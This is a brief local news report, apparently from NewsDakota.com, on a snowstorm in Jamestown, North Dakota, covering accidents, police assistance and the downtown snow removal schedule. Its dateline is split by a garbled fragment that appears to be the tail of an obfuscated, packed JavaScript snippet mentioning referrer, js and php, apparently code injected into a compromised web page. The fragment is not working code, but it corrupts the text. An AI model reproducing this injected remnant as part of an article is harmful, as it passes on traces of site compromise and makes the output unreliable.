JAMESTOWN, nyynk|var|u0026u|referrer|stbrz||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The first major snow storm has hit the region.

Blizzard-like conditions have continued for a majority of Monday, making travel dangerous and causing several accidents across the state. Jamestown Police, Stutsman County Sheriff’s Deputies and North Dakota Highway Patrols have been busy assisting numerous individuals that are either stuck or involved in accidents.

The City of Jamestown began clearing emergency routes this morning, but will conduct full snow removal in the downtown area at 11:00 PM tonight and continue through the night. Downtown merchants and all private and public schools are asked to have their sidewalks shoveled by 9 PM tonight.

Snow removal schedule is all contingent upon changing weather conditions and snow accumulation totals.
